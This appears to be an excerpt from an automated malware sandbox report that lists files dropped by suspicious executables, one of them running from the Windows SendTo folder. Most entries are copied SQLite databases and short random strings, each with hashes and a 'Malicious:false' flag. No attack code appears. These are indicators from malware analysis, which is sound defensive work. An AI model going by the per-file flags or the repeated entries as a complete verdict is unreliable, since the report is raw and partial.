                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):49152
                                          Entropy (8bit):0.8180424350137764
                                          Encrypted:false
                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                          MD5:349E6EB110E34A08924D92F6B334801D
                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                          Category:dropped
                                          Size (bytes):28672
                                          Entropy (8bit):2.5793180405395284
                                          Encrypted:false
                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5712781801655107
                                          Encrypted:false
                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:05A60B4620923FD5D53B9204391452AF
                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5707520969659783
                                          Encrypted:false
                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                          Malicious:false
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):25
                                          Entropy (8bit):4.483856189774723
                                          Encrypted:false
                                          SSDEEP:3:78HNdl7OtP:yPlS9
                                          MD5:A3C1AD7D6B4B1059C62E4B05629682A0
                                          SHA1:F29D6592A89D19C68D17D6222AB443E14AFF49B0
                                          SHA-256:49BDE8891A817F6CC0184F4C1B8FA2E1B9C40CC9A85794324DD5F3A6F5C33F2A
                                          SHA-512:124F0D0ABBAC7944A7B0C37E0A8BBBB72408A62803043222978AC8E0E581CA6CB3FB324C4A7D27D629BBFD7BB79EE35043DBF46C20A660C5D3DFD436D28580B1
                                          Malicious:false
                                          Preview:ZcqPuRbGTVMxgCfx3pKh9P7ej
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......8...........$...
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......4...........!...
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Preview:SQLite format 3......@ ...
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5712781801655107
                                          Encrypted:false
                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:05A60B4620923FD5D53B9204391452AF
                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                          Malicious:false
                                          Preview:SQLite format 3......@ ...
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):49152
                                          Entropy (8bit):0.8180424350137764
                                          Encrypted:false
                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                          MD5:349E6EB110E34A08924D92F6B334801D
                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5712781801655107
                                          Encrypted:false
                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:05A60B4620923FD5D53B9204391452AF
                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5707520969659783
                                          Encrypted:false
                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):49152
                                          Entropy (8bit):0.8180424350137764
                                          Encrypted:false
                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                          MD5:349E6EB110E34A08924D92F6B334801D
                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5707520969659783
                                          Encrypted:false
                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                          Category:dropped
                                          Size (bytes):28672
                                          Entropy (8bit):2.5793180405395284
                                          Encrypted:false
                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5712781801655107
                                          Encrypted:false
                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:05A60B4620923FD5D53B9204391452AF
                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5712781801655107
                                          Encrypted:false
                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:05A60B4620923FD5D53B9204391452AF
                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):49152
                                          Entropy (8bit):0.8180424350137764
                                          Encrypted:false
                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                          MD5:349E6EB110E34A08924D92F6B334801D
                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):25
                                          Entropy (8bit):4.403856189774723
                                          Encrypted:false
                                          SSDEEP:3:I8DjOKo90dN:1jyWdN
                                          MD5:8B6DEB79DC5DB96C4F16CB7F59DE6B9B
                                          SHA1:69B41346161F8B9BFDC53D2D1583F6A5C86BF55C
                                          SHA-256:F1C7B9932F20748278515BB70E1B65C5FE1FD81226BA6F7FDCBC3D0D814523A1
                                          SHA-512:4B4EF62A8D079C4D494101DC9339109B8274E77CA7A8BAF9ACC9C94CF98B4302C1E87CA94BDF5949430347F1997D74E3A7198EEA5EEF17B1C9087A181048A16E
                                          Malicious:false
                                          Preview:22gBDYfzpeoh6InoM7wNQxbRx
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                          Category:dropped
                                          Size (bytes):28672
                                          Entropy (8bit):2.5793180405395284
                                          Encrypted:false
                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
